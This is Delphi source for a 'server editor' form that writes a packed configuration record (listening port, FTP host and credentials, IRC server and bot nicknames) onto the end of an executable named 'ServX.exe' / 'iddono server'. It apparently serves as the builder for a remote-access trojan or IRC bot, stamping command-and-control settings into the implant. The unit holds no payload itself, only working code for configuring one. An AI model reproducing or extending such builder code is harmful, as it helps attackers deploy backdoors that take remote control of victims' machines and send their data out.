unit ServerEdit;

interface

uses
  Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
  StdCtrls, ExtCtrls;

type
  TForm1 = class(TForm)
    Image1: TImage;
    Shape11: TShape;
    EgoLabel: TLabel;
    TitleLabel: TLabel;
    RadioButton1: TRadioButton;
    ServLab1: TLabel;
    ServEdit1: TEdit;
    ServLab2: TLabel;
    ServEdit2: TEdit;
    Label10: TLabel;
    Label11: TLabel;
    Label12: TLabel;
    Shape3: TShape;
    Label13: TLabel;
    Shape6: TShape;
    FtpLab1: TLabel;
    FtpLab2: TLabel;
    FtpEdit1: TEdit;
    FtpEdit2: TEdit;
    FtpLab4: TLabel;
    FtpEdit4: TEdit;
    FtpLab3: TLabel;
    FtpEdit3: TEdit;
    IrcLab1: TLabel;
    IrcLab2: TLabel;
    IrcEdit1: TEdit;
    IrcEdit2: TEdit;
    IrcLab4: TLabel;
    IrcEdit4: TEdit;
    IrcLab3: TLabel;
    IrcEdit3: TEdit;
    OpenDlg: TOpenDialog;
    procedure TitleLabelMouseDown(Sender: TObject; Button: TMouseButton;
      Shift: TShiftState; X, Y: Integer);
    procedure RadioButton1MouseDown(Sender: TObject; Button: TMouseButton;
      Shift: TShiftState; X, Y: Integer);
    procedure Label11Click(Sender: TObject);
    procedure Label12Click(Sender: TObject);
    procedure Label10Click(Sender: TObject);
    procedure FormCreate(Sender: TObject);
    procedure Label13Click(Sender: TObject);
    procedure ServEdit2KeyPress(Sender: TObject; var Key: Char);
    procedure ServEdit2Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.DFM}

const
  MagicWord = 22981;

type
  _SERV_CONF = packed record
      serv_magic: Word;
      serv_prt: Word;
      serv_ftp: array [0..30] of Char;
      serv_ftp_prt: Word;
      serv_ftp_user: array [0..15] of Char;
      serv_ftp_pws: array [0..15] of Char;
      serv_irc: array [0..30] of Char;
      serv_irc_prt: Word;
      serv_irc_nicka: array [0..10] of Char;
      serv_irc_nickb: array [0..10] of Char;
  end;
  TServerConf = _SERV_CONF;

var
  ConFound : Boolean;

procedure StrToChar(s : string; var achr; max : Integer);
type
  TBytes = array[0..255] of Char;
var
  i, len : Integer;
begin
   len := Length(s);
   for i:= 0 to max do begin
    if i = len then Break;
    TBytes(achr)[i] := s[i + 1];
   end;
end;

procedure HideShowControls(namectrl: string; showctrl: Boolean);
var
  i: Integer;
begin
  i:=0;
  repeat
    if Pos(namectrl, Form1.Components[i].Name) > 0 then
    begin
      (Form1.Components[i] as TControl).Enabled := showctrl;
      (Form1.Components[i] as TControl).Visible := showctrl;
      (Form1.Components[i] as TControl).BringToFront;
    end;
    inc(i, 1);
  until Form1.ComponentCount = i;
end;

procedure CargaConfiguracion(FileName : string);
var
  //Copia de archivo
  SrcFile : THandle;
  Buffile: array [1..1024] of Char;
  BytesRead, BytesWirte : DWORD;
  FileStatus : Boolean;
  ServerConf : TServerConf;
begin
  FillChar(ServerConf,SizeOf(ServerConf),0);

  SrcFile := CreateFile (PChar(FileName), GENERIC_READ,
  0, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
  SetFilePointer(SrcFile, -(SizeOf(ServerConf)), 0, FILE_END);
  FileStatus := ReadFile(SrcFile, ServerConf, SizeOf(ServerConf), BytesWirte, 0);
  if ServerConf.serv_magic = 22981 then begin
    ConFound := True;
    Form1.ServEdit1.Text := IntToStr(ServerConf.serv_prt);

    Form1.FtpEdit1.Text := IntToStr(ServerConf.serv_ftp_prt);
    Form1.FtpEdit2.Text := ServerConf.serv_ftp;
    Form1.FtpEdit3.Text := ServerConf.serv_ftp_user;
    Form1.FtpEdit4.Text := ServerConf.serv_ftp_pws;

    Form1.IrcEdit1.Text := IntToStr(ServerConf.serv_irc_prt);
    Form1.IrcEdit2.Text := ServerConf.serv_irc;
    Form1.IrcEdit3.Text := ServerConf.serv_irc_nicka;
    Form1.IrcEdit4.Text := ServerConf.serv_irc_nickb;
  end else begin
    Form1.ServEdit1.Text := '16666';
    Form1.FtpEdit1.Text := '21';
    Form1.FtpEdit2.Text := '';
    Form1.FtpEdit3.Text := '';
    Form1.FtpEdit4.Text := '';
    Form1.IrcEdit1.Text := '6667';
    Form1.IrcEdit2.Text := '';
    Form1.IrcEdit3.Text := '';
    Form1.IrcEdit4.Text := '';
    ConFound := False;
  end;
  CloseHandle(SrcFile);
end;

procedure SalvaConfiguracion(FileName : string);
var
  //Copia de archivo
  PToArray : PChar;
  SrcFile : THandle;
  Buffile: array [1..1024] of Char;
  BytesRead, BytesWirte : DWORD;
  FileStatus : Boolean;
  ServerConf : TServerConf;
begin
  FillChar(ServerConf, SizeOf(ServerConf), 0);

  ServerConf.serv_magic := MagicWord;
  ServerConf.serv_prt := StrToInt(Form1.ServEdit1.Text);

  ServerConf.serv_ftp_prt := StrToInt(Form1.FtpEdit1.Text);
  StrToChar(Form1.FtpEdit2.Text, ServerConf.serv_ftp, High(ServerConf.serv_ftp));
  StrToChar(Form1.FtpEdit3.Text, ServerConf.serv_ftp_user, High(ServerConf.serv_ftp_user));
  StrToChar(Form1.FtpEdit4.Text, ServerConf.serv_ftp_pws, High(ServerConf.serv_ftp_pws));

  ServerConf.serv_irc_prt := StrToInt(Form1.IrcEdit1.Text);
  StrToChar(Form1.IrcEdit2.Text, ServerConf.serv_irc, High(ServerConf.serv_irc));
  StrToChar(Form1.IrcEdit3.Text, ServerConf.serv_irc_nicka, High(ServerConf.serv_irc_nicka));
  StrToChar(Form1.IrcEdit4.Text, ServerConf.serv_irc_nickb, High(ServerConf.serv_irc_nickb));

  SrcFile := CreateFile (PChar(FileName), GENERIC_WRITE,
  0, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);

  if (ConFound) then begin
    SetFilePointer(SrcFile, -(SizeOf(ServerConf)), 0, FILE_END);
  end else begin
    SetFilePointer(SrcFile, 0, 0, FILE_END);
  end;

  FileStatus := WriteFile(SrcFile, ServerConf, SizeOf(ServerConf), BytesWirte, 0);
  CloseHandle(SrcFile);
end;

procedure TForm1.TitleLabelMouseDown(Sender: TObject; Button: TMouseButton;
  Shift: TShiftState; X, Y: Integer);
begin
if (Button = mbLeft) then begin
   ReleaseCapture();
   SendMessage (Self.Handle, $A1, 2, 0);
end;
end;

procedure TForm1.RadioButton1MouseDown(Sender: TObject;
  Button: TMouseButton; Shift: TShiftState; X, Y: Integer);
begin
   Close;
end;

procedure TForm1.Label11Click(Sender: TObject);
begin
   HideShowControls('Ftp', True);
end;

procedure TForm1.Label12Click(Sender: TObject);
begin
   HideShowControls('Irc', True);
end;

procedure TForm1.Label10Click(Sender: TObject);
begin
   HideShowControls('Ftp', False);
   HideShowControls('Irc', False);
   HideShowControls('Serv', True);
end;

procedure TForm1.FormCreate(Sender: TObject);
begin
   HideShowControls('Ftp', False);
   HideShowControls('Irc', False);
   HideShowControls('Serv', True);
   CargaConfiguracion('ServX.exe');
end;

procedure TForm1.Label13Click(Sender: TObject);
begin
   SalvaConfiguracion(ServEdit2.Text);
end;

procedure TForm1.ServEdit2KeyPress(Sender: TObject; var Key: Char);
begin
   Key := #0;
end;

procedure TForm1.ServEdit2Click(Sender: TObject);
begin
   OpenDlg.Filter :=  'iddono server (*.exe)|*.EXE';
   if OpenDlg.Execute then begin
     ServEdit2.text := OpenDlg.FileName;
     CargaConfiguracion(OpenDlg.FileName);
   end;
end;

end.
